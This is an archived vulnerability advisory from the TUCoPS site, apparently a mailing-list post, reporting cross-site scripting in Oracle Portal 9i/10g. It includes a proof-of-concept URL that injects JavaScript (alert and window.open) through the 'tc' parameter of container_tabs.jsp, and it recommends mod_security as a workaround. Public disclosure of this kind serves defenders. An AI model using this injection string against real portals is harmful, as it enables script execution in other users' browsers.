TUCoPS :: Web :: CMS / Portals :: c07-1459.htm

Oracle Applications/Portal 9i/10g Cross Site Scripting
Oracle Applications/Portal 9i/10g Cross Site Scripting
Oracle Applications/Portal 9i/10g Cross Site Scripting


Description
---------------
There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the 
Oracle Portal. The following is one that you may found in any version:

http:///webapp/jsp/container_tabs.jsp?tc=null%20=%20null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now',%20'null');// 

The following code will be generated:

---SNIPPED---

---SNIPPED---

Solution
------------

There is no solution. As a workaround, enable mod_security if it's not. 
Otherwise wait 6 months/1 year for a patch from Oracle Corp.

_________________________________________________________________
Dale rienda suelta a tu tiempo libre. Mil ideas para exprimir tu ocio con 
MSN Entretenimiento. http://entretenimiento.msn.es/

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH